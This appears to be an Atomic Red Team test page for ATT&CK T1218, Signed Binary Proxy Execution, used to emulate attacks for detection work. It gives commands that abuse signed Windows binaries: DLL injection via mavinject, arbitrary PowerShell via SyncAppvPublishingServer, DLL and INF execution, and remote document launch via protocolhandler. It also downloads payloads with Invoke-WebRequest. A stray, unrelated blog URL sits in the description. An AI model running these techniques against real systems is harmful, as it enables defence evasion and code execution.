T1218
Signed Binary Proxy Execution
Description from ATT&CK
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split) https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/
Atomic Tests
Atomic Test #1 - mavinject - Inject DLL into running process
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
Supported Platforms: windows
auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| process_id | PID of process receiving injection | string | 1000 |
| dll_payload | DLL to inject | Path | PathToAtomicsFolder\T1218\src\x64\T1218.dll |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
Dependencies: Run with powershell!
Description: T1218.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
1
2
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code
Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.
Supported Platforms: windows
auto_generated_guid: d590097e-d402-44e2-ad72-2c6aa1ce78b1
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe |
Attack Commands: Run with command_prompt!
1
2
SyncAppvPublishingServer.exe "n; #{powershell_code}"
Atomic Test #3 - Register-CimProvider - Execute evil dll
Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB
Supported Platforms: windows
auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll |
Attack Commands: Run with command_prompt!
1
2
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
Dependencies: Run with powershell!
Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
Check Prereq Commands:
1
2
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
Atomic Test #4 - InfDefaultInstall.exe .inf Execution
Test execution of a .inf using InfDefaultInstall.exe
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
Supported Platforms: windows
auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf |
Attack Commands: Run with command_prompt!
1
2
InfDefaultInstall.exe #{inf_to_execute}
Dependencies: Run with powershell!
Description: INF file must exist on disk at specified location (#{inf_to_execute})
Check Prereq Commands:
1
2
if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
Get Prereq Commands:
1
2
3
New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File
Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.
Supported Platforms: windows
auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\Office16 |
| remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx |
Attack Commands: Run with command_prompt!
1
2
#{microsoft_wordpath}\protocolhandler.exe "ms-word:nft|u|#{remote_url}"
Dependencies: Run with powershell!
Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided
Check Prereq Commands:
1
2
if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
write-host "Install Microsoft Word or provide correct path."